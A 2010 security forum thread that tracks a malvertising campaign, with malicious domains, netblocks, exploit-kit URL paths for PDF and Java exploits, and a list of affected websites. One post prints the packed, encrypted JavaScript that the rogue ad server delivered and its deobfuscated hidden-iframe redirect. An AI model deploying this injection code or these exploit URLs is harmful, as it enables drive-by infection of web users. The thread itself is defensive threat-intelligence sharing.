Malware Domain List
Malware Related => Malicious Domains => Topic started by: eoin.miller on May 11, 2010, 05:00:59 pm
-
Drive by sites serving up FakeAV and exploiting clients through PDF and Java vulnerabilities.
Virus total is only picking up 7/41 on the FakeAV currently.
http://www.virustotal.com/analisis/01b398a0ffe71f4d284df532f7d6112c6d4ca40d8ade4d358ba772f1352fc8ff-1273594077
PDF:
http://relwqin.com/b/pdf/all.pdf
Java:
http://relwqin.com/b/java/gsb2.jar
http://relwqin.com/b/java/bof.jar
Driveby URL:
http://relwqin.com/b/index.php?m=jp
-
Entry points to drive by's:
http://alenadi.com/cust.php?n=cust2
http://canteeve.com/cust.php?n=cust2
Almost all the people we have going to these sites are clicking on links from people going to Microsoft live.com mail accounts and other sites using malvertising services like those on live.com.
-
More today:
http://qwebork.com/a/index.php
http://lutypla.com/a/index.php
http://trynger.com/a/index.php
Looks like it is rotating domains daily (not surprising) and the IP is staying the same for now. Still getting linked to by legit sites that have done business with advertising services that do not provide proper vetting of organizations they choose to do business with it appears.
-
New entry point:
aledat.com
-
403 http://trynger.com/
200 http://trynger.com/b/
200 http://trynger.com/a/
200 http://trynger.com/e/
200 http://trynger.com/d/
200 http://trynger.com/c/
403 http://trynger.com/cgi-bin/
302 http://trynger.com/config/
200 http://trynger.com/b/index.php
200 http://trynger.com/b/install.php
403 http://trynger.com/b/d/
403 http://trynger.com/b/bin/
403 http://trynger.com/b/include/
403 http://trynger.com/b/java/
403 http://trynger.com/b/pdf/
200 http://trynger.com/b/d/0.php (MD5: eb2add15ac24545e28cbc87dac1a7e65)
200 http://trynger.com/b/d/1.php (MD5: eb2add15ac24545e28cbc87dac1a7e65)
200 http://trynger.com/b/d/2.php (MD5: eb2add15ac24545e28cbc87dac1a7e65)
200 http://trynger.com/b/d/3.php (MD5: eb2add15ac24545e28cbc87dac1a7e65)
200 http://trynger.com/b/d/4.php (MD5: eb2add15ac24545e28cbc87dac1a7e65)
200 http://trynger.com/b/d/5.php (MD5: eb2add15ac24545e28cbc87dac1a7e65)
200 http://trynger.com/b/bin/upload.php
200 http://trynger.com/b/include/config.php
200 http://trynger.com/b/java/bof.jar
200 http://trynger.com/b/java/gsb2.jar
200 http://trynger.com/b/pdf/all.pdf
200 http://trynger.com/b/pdf/pdf.php
200 http://trynger.com/a/index.php
200 http://trynger.com/a/install.php
403 http://trynger.com/a/d/
403 http://trynger.com/a/bin/
403 http://trynger.com/a/include/
403 http://trynger.com/a/java/
403 http://trynger.com/a/pdf/
200 http://trynger.com/a/d/0.php
200 http://trynger.com/a/d/1.php
200 http://trynger.com/a/d/2.php
200 http://trynger.com/a/d/3.php
200 http://trynger.com/a/d/4.php
200 http://trynger.com/a/d/5.php
200 http://trynger.com/a/bin/upload.php
200 http://trynger.com/a/include/config.php
200 http://trynger.com/a/java/bof.jar
200 http://trynger.com/a/java/gsb2.jar
200 http://trynger.com/a/pdf/all.pdf
200 http://trynger.com/a/pdf/pdf.php
200 http://trynger.com/e/index.php
200 http://trynger.com/e/install.php
403 http://trynger.com/e/d/
403 http://trynger.com/e/bin/
403 http://trynger.com/e/include/
403 http://trynger.com/e/java/
403 http://trynger.com/e/pdf/
200 http://trynger.com/e/d/0.php (MD5: d8fc0cbb07ab263198d7a5fbb0ee5c53)
200 http://trynger.com/e/d/1.php (MD5: d8fc0cbb07ab263198d7a5fbb0ee5c53)
200 http://trynger.com/e/d/2.php (MD5: d8fc0cbb07ab263198d7a5fbb0ee5c53)
200 http://trynger.com/e/d/4.php (MD5: d8fc0cbb07ab263198d7a5fbb0ee5c53)
200 http://trynger.com/e/d/5.php (MD5: d8fc0cbb07ab263198d7a5fbb0ee5c53)
200 http://trynger.com/e/d/3.php (MD5: d8fc0cbb07ab263198d7a5fbb0ee5c53)
200 http://trynger.com/e/bin/upload.php
200 http://trynger.com/e/include/config.php
200 http://trynger.com/e/java/bof.jar
200 http://trynger.com/e/java/gsb2.jar
200 http://trynger.com/e/pdf/all.pdf
200 http://trynger.com/e/pdf/pdf.php
200 http://trynger.com/d/index.php
200 http://trynger.com/d/install.php
403 http://trynger.com/d/d/
403 http://trynger.com/d/bin/
403 http://trynger.com/d/include/
403 http://trynger.com/d/java/
403 http://trynger.com/d/pdf/
200 http://trynger.com/d/d/0.php
200 http://trynger.com/d/d/1.php
200 http://trynger.com/d/d/2.php
200 http://trynger.com/d/d/4.php
200 http://trynger.com/d/d/5.php
200 http://trynger.com/d/d/3.php
200 http://trynger.com/d/bin/upload.php
200 http://trynger.com/d/include/config.php
200 http://trynger.com/d/java/bof.jar
200 http://trynger.com/d/java/gsb2.jar
200 http://trynger.com/d/pdf/all.pdf
200 http://trynger.com/d/pdf/pdf.php
200 http://trynger.com/c/index.php
200 http://trynger.com/c/install.php
403 http://trynger.com/c/d/
403 http://trynger.com/c/bin/
403 http://trynger.com/c/include/
403 http://trynger.com/c/java/
403 http://trynger.com/c/pdf/
200 http://trynger.com/c/d/0.php
200 http://trynger.com/c/d/1.php
200 http://trynger.com/c/d/3.php
200 http://trynger.com/c/d/2.php
200 http://trynger.com/c/d/4.php
200 http://trynger.com/c/d/5.php
200 http://trynger.com/c/bin/upload.php
200 http://trynger.com/c/include/config.php
200 http://trynger.com/c/java/bof.jar
200 http://trynger.com/c/java/gsb2.jar
200 http://trynger.com/c/pdf/all.pdf
200 http://trynger.com/c/pdf/pdf.php
200 http://aledat.com/
200 http://aledat.com/cust.php
200 http://aledat.com/index.php
200 http://aledat.com/phpinfo.php
403 http://aledat.com/b/
403 http://aledat.com/w/
403 http://aledat.com/ad/
403 http://aledat.com/cgi-bin/
403 http://aledat.com/ad/js/
edit: forgot the other one :D
-
Found the advertising server that is redirecting to the intermediary and eventually the exploit sites:
adnet.media.roxantb.com
That domain was registered last month and serves up packed/obfuscated javascript:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 3M={5f:q(m,e,n){m=12.3F(m);5 R=[],M=\'\';x(5 i=0;i<m.j;i+=3){5 11=\'1\';x(5 h=0;h<3;h++){v(i+h<m.j){N=8.o(m.f(i+h))-30;v(N.j<2)N=\'0\'+N}3K 5a;11+=N}R.2t(11+\'1\')}x(5 k=0;k<R.j;k++){5 P=8.13(R[k],e,n);5 L=P.X(16);V(L.j<7)L=\'0\'+L;M+=L}M=M.3R(3P 3O(\'^+|+$\',\'g\'),\'\');b 8.2r(M)},3N:q(c,d,n){c=8.2p(c);5 G=[],U=\'\',18=\'\';x(5 i=0;i<c.j;i+=7)G.2t(c.Y(i,7));x(5 u=0;u<G.j;u++)v(G[u]==\'\')G.5b(u,1);x(5 u=0;u<G.j;u++){5 P=8.13(Z(G[u],16),d,n)+\'\';U+=P.Y(1,P.j-2)}x(5 u=0;u<U.j;u+=2)18+=8.a(Z(U.Y(u,2),10)+30);b 12.3Q(18)},o:q(a){b t.o(a)},a:q(2u){b t.a(2u)},17:q(g,l){b g-(l*58.59(g/l))},13:q(2s,14,19){5 W=1,i=0,O=2s;V((14>>i)>0){v(((14>>i)&1)==1)W=8.17((W*O),19);O=8.17((O*O),19);i++}b W},2r:q(B){b B;5 J=\'\';x(5 i=0,Q=B.j;i<Q;i+=2){5 I=Z(\'\'+B.f(i)+B.f(i+1),16).X(10);J+=t.a(I)}b J},2p:q(B){b B;5 J=\'\';x(5 i=0,Q=B.j;i<Q;i++){5 I=t.o(B.f(i)).X(16);J+=I.j==2?I:\'0\'+I}b J}};5 t={F:{3J:{2v:2q,2B:2w,2z:2A,2y:2x,2n:2o,2e:2d,2b:2c,2a:29,2g:2f,2m:2l,2j:2k,2i:2h,2D:2C,2Y:2X,28:2W,2U:2T,31:2Z,35:36,32:34,2S:33,2I:2R,2H:2J,2E:2G,2K:2F,2Q:2L,2O:2P,2N:2M,1M:37,1r:1p,1t:1u,1q:1x,1w:1v,1C:1B,1z:1A,1y:1o,1m:1D,1f:1d,1a:1c,1e:1b,1l:1n,1k:1g,1h:1j,1s:1i,1Y:27,1X:1Z,1U:1W,20:1V,26:21,24:25,1E:22,1T:23,1J:1S,1I:1K,1F:1H,1L:1G,1Q:1R,1N:1P,2V:1O,4v:3c,38:4r,4u:4t,4p:4s,4w:4q,4A:4B,4y:4z,4n:4o,4e:4d,4b:4c,4a:49,4g:4f,4m:4l,4D:4k,4h:4j,4C:4i,4Y:4H,4X:4Z,4U:4W,51:4V,52:55,53:56,50:54,4I:4S,4T:4J,4E:4G,4K:4F,4Q:4L,4P:4R,4M:4O,4x:4N,3t:47,3s:3u,3p:3r,3v:3q,3B:3w,3z:3A,3y:3x,3n:3o,3e:3d,3b:48,3a:39,3g:3f,3m:3l,3j:3k,3i:3h,3D:3C,3Z:3Y,3W:3X,3V:3U,41:40,45:46,42:44,3T:43,3I:3S},3H:{2q:2v,2w:2B,2A:2z,2x:2y,2o:2n,2d:2e,2c:2b,29:2a,2f:2g,2l:2m,2k:2j,2h:2i,2C:2D,2X:2Y,2W:28,2T:2U,2Z:31,36:35,34:32,33:2S,2R:2I,2J:2H,2G:2E,2F:2K,2L:2Q,2P:2O,2M:2N,37:1M,1p:1r,1u:1t,1x:1q,1v:1w,1B:1C,1A:1z,1o:1y,1D:1m,1d:1f,1c:1a,1b:1e,1n:1l,1g:1k,1j:1h,1i:1s,27:1Y,1Z:1X,1W:1U,1V:20,21:26,25:24,22:1E,23:1T,1S:1J,1K:1I,1H:1F,1G:1L,1R:1Q,1P:1N,1O:2V,3c:4v,4r:38,4t:4u,4s:4p,4q:4w,4B:4A,4z:4y,4o:4n,4d:4e,4c:4b,49:4a,4f:4g,4l:4m,4k:4D,4j:4h,4i:4C,4H:4Y,4Z:4X,4W:4U,4V:51,55:52,56:53,54:50,4S:4I,4J:4T,4G:4E,4F:4K,4L:4Q,4R:4P,4O:4M,4N:4x,47:3t,3u:3s,3r:3p,3q:3v,3w:3B,3A:3z,3x:3y,3o:3n,3d:3e,48:3b,39:3a,3f:3g,3l:3m,3k:3j,3h:3i,3C:3D,3Y:3Z,3X:3W,3U:3V,40:41,46:45,44:42,43:3T,3S:3I}},o:q(a,r){r=r||\'3J\';v(!8.F[r])b 3G;a=a.5g(0);b(a 3E 8.F[r])?8.F[r][a]:a},a:q(o,r){r=r||\'3H\';v(!8.F[r])b 3G;o=(o 3E 8.F[r])?8.F[r][o]:o;b 5m.5h(o)}};5 12={w:"5l+/=",3F:q(p){5 s=\'\',H,C,D,K,E,z,y,i=0;V(i<p.j){H=t.o(p.f(i++));C=t.o(p.f(i++));D=t.o(p.f(i++));K=H>>2;E=((H&3)<<4)|(C>>4);z=((C&15)<<2)|(D>>6);y=D&5i;v(3L(C))z=y=S;3K v(3L(D))y=S;s=s+8.w.f(K)+8.w.f(E)+8.w.f(z)+8.w.f(y)}b s},3Q:q(p){5 s=\'\',H,C,D,K,E,z,y,i=0;p=p.3R(3P 3O(\'[^A-5j-5e-9+/=]\',\'g\'),\'\');V(i<p.j){K=8.w.T(p.f(i++));E=8.w.T(p.f(i++));z=8.w.T(p.f(i++));y=8.w.T(p.f(i++));H=(K<<2)|(E>>4);C=((E&15)<<4)|(z>>2);D=((z&3)<<6)|y;s=s+t.a(H);v(z!=S)s=s+t.a(C);v(y!=S)s=s+t.a(D)}b s}};5d(3M.3N(\'57\',\'5c\',\'5k\'));',62,333,'|||||var|||this||chr|return||||charAt||||length|||||ord|input|function|dir|output|ASCII||if|alphabet|for|enc4|enc3||str|chr2|chr3|enc2|translations|decryptarray|chr1|bte|result|enc1|chunk|coded|tmpstr|basepow2|resultmod|len|asci|64|indexOf|deencrypt|while|accum|toString|substr|parseInt||tmpasci|BASE64|powmod|exp|||mod|resultd|modulus|1028|175|170|168|1031|1025|179|1169|184|180|1110|1030|1168|178|163|156|1115|1114|1105|1116|157|159|1119|158|1032|1118|162|161|1038|165|1040|1044|197|196|1043|1042|195|1045|8250|1047|200|199|1046|198|194|1041|1112|189|188|1108|8470|186|1029|190|192|193|1111|191|1109|185|1035|135|8225|8224|134|133|8230|136|8364|139|8249|1033|138|137|8240|8222|132|strhex|128|hexstr|base|push|num|1026|129|131|1107|8218|130|1027|140|1034|8211|151|150|8226|8221|149|8212|152|154|1113|8482|153|65533|148|8220|143|1039|1048|142|141|1036|144||1106|8217|147|146|8216|145|155|1050|242|1090|1089|201|240|1088|243|1091|246|1094|1093|245|244|1092|1087|239|1082|235|234|1081|1080|233|1083|236|238|1086|1085|237|1084|247|1095|in|encode|null|php2js|1103|js2php|else|isNaN|RSA|decrypt|RegExp|new|decode|replace|255|1102|250|1098|1097|249|248|1096|251|1099|1101|254|253|1100|252|232|241|211|1059|1058|210|209|1057|212|1060|1063|216|215|214|213|1061|1056|208|1052|205|202|204|203|1051|1049|1053|1079|1055|207|1054|206|1064|1062|1074|227|226|217|1072|225|1075|228|1078|231|230|1077|1076|229|224|1073|1067|220|219|1066|1065|218|1071|1068|1069|1070|223|221|222|1e0207526271ff2eedf4423bec450e06a6f1f528ac28ea9c4050c2d003cbab303400fe28ea9c4050c2d003cbab303400fe2dae2430da709233f18d90dfbafc242d8ab1ce7d6e385b92c28d9dcc260d92b2f9c03c18bc4a128d9dcc260d92b0964bf818bc4a1167111c271c61c2dbd91d03809de2e0b7cd39764932dbd91d03809de2e0b7cd39764932dbd91d03809de2e0b7cd353c74638daa560bbc7450439e830637fdc07a4226081064f1a81a3a041041025346a428663c1125e31404104102b7f48428663c106d7b240d03df82daa6a33958fb72e063be15334d81a5f1ca38ad0051dc1d2515d364525644f5320b3f2125e31410161ec050c2d003cbab303400fe28ea9c4050c2d003cbab303400fe2dae2430da709233f18d90dfbafc242d8ab1ce7d6e385b92c28d9dcc260d92b2f9c03c18bc4a128d9dcc260d92b0964bf818bc4a1362a6bc19de87c1678dc41a844d71e9390b0cec8741fb659b08f567703cd1f415334d80c8047520b93d527e6ea61936fa60ae650f0730a9f167111c31fa20d0592c0220f6b3030dfff80edc77008c468b3208b7106d8142234f47406d6e04034948b2da7f6024f82a038588d62dc5030115424a0532e9d23bfc961757fb00b29df70a160b62ee078d247a6730b29df731d765039c4d912b4ec5b11b9dc623ef17438588d60297027241f38f10ab52527898691655b231eb65f715461bd29b668622be1d2074ae1011412280f73d7d2b49a3a11070d52dbe78c05a3ac43233df42f9a9ff07547a5148f29700897fa3032d8c274e65a3977c7304140921d15cde165a317285260f30eac2618af9ed2b5b76738db07f216ab7a13836572d9e39f00e4ce81ff08df043c95a2f1021805cb82e0dd8ba3381c41313c32cf1c1cbbe15ca10c0be411b0faec0009c222e08d6bf30c8d81a233f12724e8ae21128b9d14a49f815461bd30849002c04c3f036c44b193f8d01542b392c6bb5c021099f1c8a3fe0a480c70b2189106ff0b11c9ab7f173b8bb26700e401d1f9e171b134087cabc22a9b812854a9535c7dc72f9f68425e0d392e8f91b3836d0f21d915a067e04e1057eea073afcf10810671ca2ccd2dbe8560dcf5f617804470b679950fa04fa28d0bd3296c29930746f535a751111ce64728001ce1d7ac4a283623e0522faa39d77db058275b16aa6ed34e43590c1b15a2119788193c20a274e65a3977c7304140921d15cde165a317285260f30eac2618af9ed2b5b76738db07f216ab7a13836572d9e39f00e4ce81ff08df043c95a2f1021805cb82e0dd8ba3381c41313c32cf2dbf1501bb943b316f25238e312b0dd21811a037b5399384d3294b8a36da9b62cb6fc1392303d0cda4430a605f00e5e84322e4e23316b13012d4bfa0f22aac013e4d91a0efac25b58782c4047801d16b5121ce8a30660b71263fe915b9df1009dca82badb6924531452dcbe66145c41d07c1b28043431e382c01a2b416f42ff2347187b04a1d56b4333a22b53893393269aa271dd73b20d457861ebef29262c1330b80af7003f04d184586c0e4931d03400fe2e46aaf20aa7542a03011171ac1e35fd8b32ff23471b9dad832f6d501286e8e352dc9f0da8e94318d7b00cc6a6805a4a8918869d90c4c46c16bcaaf2f14b3e29d353420063ff1dddce30c50ff82654d24316da3000a3eac105373a208e740122df942e088031195c680175b9d27593bf2a67f1831ff59d26a48d107f41ac0b052c519f0aae1d81ab519085a705426ca1857780362f28322268012dc7c7919c0f7029460321cf70b71d5dbd7355d91929460322706ca73835f5618eb1962545dfe2fa283c372e3fb1610872174eef327148c315ad7120ce58701b9dad832f6d500995ef901f626d2939e0e082f1b1267704e15710252713bc524d2dd614593b414fbe990bb34a6015f07d0fffcec1b1a148215b373298545e0206bc820bf59c31ef6ca37b300814349323795d8c336fcd11f2dcd328d0bd314d2eb03813ce001e0cd01be68b90e3af110b2d8cd316da30021427b37bc5351d7ac4a0dde4c303e297435999cf34cfa0e0b10ba4346d54f0da70920ea16690ca99ae086c7401e2c8990abb2f10952f3f0006bb0160c00c1ac67b42010e990b0879726b75a6385db6921dc6122ae56512719841386ebf2109caaa2eedf4435d99f109440781fc1e7237a1ecc08176460661abe011bcc01d7561f1c27b2438971a338b9e162c37b1800df36c07260ed03c38dc25b15a41ff09700fbebfb2f952c31f92b83184062b084071f244f8a81ab739a26cc15c0342f2a111200009c9b5801f626d2939e0e082f1b1267704e18ca28f|Math|floor|break|splice|3451759|eval|z0|encrypt|charCodeAt|fromCharCode|63|Za|60670333|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|String'.split('|'),0,{}))
Deobfuscated:
<iframe src="http://aledat.com/cust.php?n=cust2" style="visibility: hidden;" height="1" width="1"></iframe>
<iframe class=" izvpldobgmpcxynswtnf" src="http://adnet.media.roxantb.com/stats_js_e.php?id=22214735" style="visibility: hidden;" height="1" width="1"></iframe>
<a href="http://curves.com/?=34547" target="_blank">
<img class=" izvpldobgmpcxynswtnf" src="http://adnet.media.roxantb.com/banners/load.php?id=22214735" border="0"></a>
In this instance, the aledat.com/cust.php?n=cust2 request redirects to another site that actually has the driveby kit on it.
-
What exactly is the url of obfuscated code ?
-
There is also another domain name on this IP, I should be able to churn up some more domains now.
adnet.media.plebert.com
-
What exactly is the url of obfuscated code ?
here is an example one:
http://adnet.media.roxantb.com/bn/j/cd/?rq=104192&sid=22214735&m=514&tn=7&d=s&ct=1&t=s
-
Malvertising hostnames:
adnet.media.roxantb.com
adnet.media.plebert.com
adnet.media.ditent.com
adnet.media.modicea.com
IP addresses:
188.72.192.52
188.72.192.67
188.72.192.221
-
Sooooo, yea, there is tons of badness going on in here. Basically, all traffic to the 188.72.192.0/24 should be considered suspect.
Hostnames within the 188.72.192.0/24 we have seen traffic to/from in the last month or so:
ad.doubleclick.net.spellet.com
adfarm.mediaplex.com.rulash.com
adnet.media.ditent.com
adnet.media.modicea.com
adnet.media.plebert.com
adnet.media.roxantb.com
aledat.com
alenadi.com
canteeve.com
media.fastclick.net.attesca.com
mediastatsfx.com
sefito.com
stathyte.com
view.atdmt.com.dilann.com
view.atdmt.com.intati.com
www.downloads.ws - [i]Probably[/i] not a malware site...
Looks like they enjoy keeping the real domain names of advertising servers as a prefix to their own.
-
Almost all the people we have going to these sites are clicking on links from people going to Microsoft live.com mail accounts and other sites using malvertising services like those on live.com.
Hi do you have more information about that? Does it happen on blogs, hotmail ... ? If it comes through MS advertising I can get those pulled but I need more information where the redirects occur if possible.
Looks like they enjoy keeping the real domain names of advertising servers as a prefix to their own.
Yes, that's going on for a while already.
-
Almost all the people we have going to these sites are clicking on links from people going to Microsoft live.com mail accounts and other sites using malvertising services like those on live.com.
Hi do you have more information about that? Does it happen on blogs, hotmail ... ? If it comes through MS advertising I can get those pulled but I need more information where the redirects occur if possible.
Most of the time it is when people login to the live.com mail account, the banner ad has the packed/obfuscated javascript that is served up by one of the following domains:
ad.doubleclick.net.spellet.com
adfarm.mediaplex.com.rulash.com
adnet.media.ditent.com
adnet.media.modicea.com
adnet.media.plebert.com
adnet.media.roxantb.com
media.fastclick.net.attesca.com
view.atdmt.com.dilann.com
view.atdmt.com.intati.com
Then that JavaScript from the above list of sites includes an iframe that loads content from the following domains:
aledat.com/?cust=2
alenadi.com/?cust=2
canteeve.com/?cust=2
sefito.com/?cust=2
stathyte.com/?cust=2
Then the content loaded from those sites causes the actual drive by's to be loaded from the following sites which all resolve to 194.8.250.60/194.8.250.61:
polkita.com
www.lutypla.com
zarenaga.com
turkinke.com
relwqin.com
trynger.com
qwebork.com
Looks like they enjoy keeping the real domain names of advertising servers as a prefix to their own.
Yes, that's going on for a while already.
-
Forgot to add that anything within the 194.8.250.0/24 should also be considered suspect.
194.8.250.0/24 - Hosts the drive by's, exploits and malware.
188.72.192.0/24 - Hosts the Malicious advertising services redirecting to the drive by, exploit and malware.
-
Domains we have seen using these advertising services, primarily the most referrers have been mail.live.com servers once users have logged in to check their mail.
ad.doubleclick.net
adnet.media.ditent.com
ad.yieldmanager.com
anet.tradedoubler.com
apps.detnews.com
b5.boards2go.com
beforeitsnews.com
blogs.citizen-times.com
blogs.desmoinesregister.com
bobshouseofvideogames.com
caloriecount.about.com
classifieds.gftribune.com
comics.com
courier-journal.weather.gannettonline.com
cvhs.adbureau.net
dailyfreeman.ca.kaango.com
dailylocal.com
dailysquee.com
data.tennessean.com
delcotimes.com
detnews.com
forums.televisionwithoutpity.com
googleads.g.doubleclick.net
hawaiipreps.honoluluadvertiser.com
hfboards.com
ihasahotdog.com
lumberjocks.com
macombdaily.com
mainlinemedianews.com
mediatakeout.com
middletownpress.com
moneycentral.msn.com
movies.msn.com
msn.foxsports.com
mylifeisaverage.com
nashvillecitypaper.com
nbcsports.msnbc.com
nhregister.com
obituaries.citizen-times.com
ouinsider.com
oxygen.com
photos.indystar.com
php.app.com
pioneer.olivesoftware.com
pqasb.pqarchiver.com
pubads.g.doubleclick.net
ratemyprofessors.com
saratogian.com
sec.todaysthv.com
svc1.m5prod.net
tag.admeld.com
thedailywh.at
the.honoluluadvertiser.com
topix.cachefly.net
trentonian.com
troyrecord.com
tv.msn.com
webmail.peoplepc.com
www.13wmaz.com
www.49erswebzone.com
www.9news.com
www.apartments.com
www.app.com
www.argusleader.com
www.azcentral.com
www.barnesandnoble.com
www.baxterbulletin.com
www.bigeasyclassifieds.com
www.calgarysun.com
www.captivate.com
www.cars.com
www.casttv.com
www.charter.net
www.chillicothegazette.com
www.citizen-times.com
www.clarionledger.com
www.cnweekly.com
www.coshoctontribune.com
www.courier-journal.com
www.courierpostonline.com
www.crimsonconfidential.com
www.dailyfreeman.com
www.dailylocal.com
www.dailyrecord.com
www.dailyworld.com
www.darkroastedblend.com
www.delawareonline.com
www.delcotimes.com
www.delmarvanow.com
www.democratandchronicle.com
www.desmoinesregister.com
www.excite.com
www.federaltimes.com
www.fishexplorer.com
www.floridatoday.com
www.fox5vegas.com
www.freep.com
www.greatfallstribune.com
www.greenandwhite.com
www.greenbaypressgazette.com
www.guampdn.com
www.hawaiinavynews.com
www.heritage.com
www.heritagenews.com
www.honoluluadvertiser.com
www.huffingtonpost.com
www.india-forums.com
www.lansingstatejournal.com
www.legacy.com
www.lohud.com
www.macombdaily.com
www.mainlinemedianews.com
www.mentalfloss.com
www.middletownpress.com
www.montgomeryadvertiser.com
www.morningjournal.com
www.mycentraljersey.com
www.nashuatelegraph.com
www.neogaf.com
www.news-herald.com
www.newsleader.com
www.news-press.com
www.nextdaypets.com
www.nhregister.com
www.oneidadispatch.com
www.overclockersclub.com
www.portclintonnewsherald.com
www.pottsmerc.com
www.pottstownmercury.com
www.press-citizen.com
www.pressconnects.com
www.prosportsdaily.com
www.racingjunk.com
www.rawstory.com
www.registercitizen.com
www.rgj.com
www.saratogian.com
www.speedwaymedia.com
www.stevenspointjournal.com
www.tallahassee.com
www.televisionwithoutpity.com
www.tennessean.com
www.tetongravity.com
www.theadvertiser.com
www.thecalifornian.com
www.theithacajournal.com
www.themorningsun.com
www.thenewsstar.com
www.thereporteronline.com
www.thespectrum.com
www.thetimesherald.com
www.timesherald.com
www.tmnews.com
www.tomshardware.com
www.trentonian.com
www.troyrecord.com
www.universalsports.com
www.usanetwork.com
www.visaliatimesdelta.com
www.wausaudailyherald.com
www.wbir.com
www.wisconsinrapidstribune.com
www.worldtimeserver.com
www.wtsp.com
www.wusa9.com
www.zanesvilletimesrecorder.com
-
This has been tossed over to US-CERT, dsheild/SANS and MS. Hopefully these guys can get rooted out of the affiliate networks quickly.
-
Someone sent us this url by contact form.
http://adnet.media.unwited.com/cr/j/cd/?rt=47210&sid=2421828&m=5171&ts=31&d=x&ctc=31&tm=sc
url format looks exactly like the one from adnet.media.roxantb.com. I don't see any redirection to malwareurl.
Obfuscated code contains a link to bestwestern.com.
-
also reported today
adnet.media.prananc.com/b/jx/cd/?rq=103193&sid=215411720&m=714&tn=4&d=s&ct=1&t=s
adnet.media.ditent.com/bn/j/cd/?rq=104192&sid=9472394&m=514&tn=7&d=s&ct=1&t=s
-
Someone sent us this url by contact form.
http://adnet.media.unwited.com/cr/j/cd/?rt=47210&sid=2421828&m=5171&ts=31&d=x&ctc=31&tm=sc
url format looks exactly like the one from adnet.media.roxantb.com. I don't see any redirection to malwareurl.
Obfuscated code contains a link to bestwestern.com.
Domain is definately malicious and actively being seen on our network. I've seen it not include the malicious URL's sometimes, not sure why really. Obfuscated javascript leads client to the following exploit kit URL's in order in the sample we have looked at:
http://phicruss.com/cust.php?n=cust2
http://bbnhs.com/c/index.php
JS Unpack Report for URL http://adnet.media.unwited.com/cr/j/cd/?rt=47210&sid=2421828&m=5171&ts=31&d=x&ctc=31&tm=sc:
http://jsunpack.jeek.org/dec/go?report=b39fc1948d85cbd5b96bee1ee078ea2b432bbe59
They flipped to the 178.162.133.0/24 netblock on 5-14-10 @15:00 UTC. Luckily this is only for the advertising server hosting the javascript that is redirecting. The domains still being served up currently go to the other previously mentioned netblocks (188.72.192.0/24, 194.8.250.0/24). Most advertising now seems to be referred by Yahoo! web mail services. hooray.
-
This has been tossed over to US-CERT, dsheild/SANS and MS. Hopefully these guys can get rooted out of the affiliate networks quickly.
Correction: US-CERT & SANS and Dshield. MS still has nothing and they are the only ones who can do something about it.
Most advertising now seems to be referred by Yahoo! web mail services. hooray
Yeah, so what about those victims? Got any PCAP's of going through Yahoo as I have contacts in every advertising network and that way faster than SANS (it's not even their business).
Imagine how many more people have been infected because you send stuff to the wrong people ?
-
This has been tossed over to US-CERT, dsheild/SANS and MS. Hopefully these guys can get rooted out of the affiliate networks quickly.
Correction: US-CERT & SANS and Dshield. MS still has nothing and they are the only ones who can do something about it.
Most advertising now seems to be referred by Yahoo! web mail services. hooray
Yeah, so what about those victims? Got any PCAP's of going through Yahoo as I have contacts in every advertising network and that way faster than SANS (it's not even their business).
Imagine how many more people have been infected because you send stuff to the wrong people ?
The handlers at these various organizations told me they are disseminating the information appropriately to the correct places. If you wish to furnish me with direct contacts at any of these organizations, I will talk to them directly about it and provide any information I have to help stop it. I do not send out PCAP's of my clients data to unknown sources via web forums, even after I have taken the time to sanitize them. This isn't my first rodeo.
And FYI, SANS is part of the co-op that is DShield.
http://www.dshield.org/
http://isc.sans.org/
Look similiar?
-
FYI, this is still running pretty rampant, watching people get referred from sites like open.ad.yieldmanager.net:
HTTP/1.1 200 OK
Date: Mon, 24 May 2010 14:43:12 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV T
AI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI
PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Connection: close
Transfer-Encoding: chunked
Content-Type: application/x-multiad-json; charset=UTF-8
Content-Length: 10536
(function(){
var multiAdPack = {
"encoding":"UTF-8",
"version":"1.1",
"reqtype":"ac",
"ads":[
{"ad":"<!-- SpaceID=2022775850 loc=AP37 noad -->\u000a<img style=\"display:none\"
width=0 height=0 alt=\"\" src=\"http://us.bc.yahoo.com/b?P=ae0af71a-6742-11df-bf
5f-bf408f606688&T=19d2poc7s%2fX%3d1274712193%2fE%3d2022775850%2fR%3dncnws%2fK%3d5
%2fV%3d8.1%2fW%3d0%2fY%3dPARTNER_US%2fF%3d2921782211%2fH%3dYWx0c3BpZD0iOTY3MjgzMT
UxIiBzZXJ2ZUlkPSJhZTBhZjcxYS02NzQyLTExZGYtYmY1Zi1iZjQwOGY2MDY2ODgiIHNpdGVJZD0iODI
4NTUxIiB0U3RtcD0iMTI3NDcxMjE5Mjk4NTUwMiIgdGFyZ2V0PSJfYmxhbmsiIA--%2fQ%3d-1%2fS%3d
1%2fJ%3d29558862&U=128h7uej0%2fN%3djLRSIkwNiZE-%2fC%3d-1%2fD%3dAP37%2fB%3d-1%2fV%
3d5\"><script>// no ads\u000a</script><!--flv has invalid value--><!--rTg has inv
alid value--><!--rTg has invalid value--><!--XCH|ae0af71a-6742-11df-bf5f-bf408f60
6688--><!--fac9.cl1.ads.adx.ac4.yahoo.com-->",
"type":"text/html",
"id":"0",
"size":["160x90"],
"slug":false,
"secure":false},
{"ad":"<script language=\"javascript\" src=\"hXXp://adnet.media.unwited.com/cr/j/
cd/?rt=47210&sid=2421828&m=5171&ts=31&d=x&ctc=31&tm=sc\">\u000d\u000d</script>\u0
00d\u000d<noscript>\u000d\u000d<a href=\"http://us.ard.yahoo.com/SIG=15vmvpbvl/M=
600742873.600772841.409311541.408347572/D=ncnws/S=2022775850:N/Y=PARTNER_US/L=ae0
af71a-6742-11df-bf5f-bf408f606688/B=j7RSIkwNiZE-/J=1274712193000950/K=33yOa_MgRUm
